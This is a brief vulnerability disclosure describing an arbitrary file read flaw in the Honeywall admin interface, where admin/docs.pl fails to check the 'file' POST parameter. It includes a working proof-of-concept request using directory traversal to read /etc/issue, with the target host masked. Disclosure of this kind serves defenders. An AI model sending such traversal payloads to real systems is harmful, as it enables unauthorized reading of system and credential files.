Publishing author: cnyouker
Vulnerability type: arbitrary file traversal/download Vulnerability description: Honeywall admin interface arbitrary file read vulnerability
Detailed description: admin/docs.pl for the POST of the file check is not strict. Can construct their own post package to read arbitrary files.
Vulnerability to prove: http://xxx.xxx.xxx/admin/docs.pl POST-content: act=1 6&file=../../../../../../../../etc/issue&submit=Submit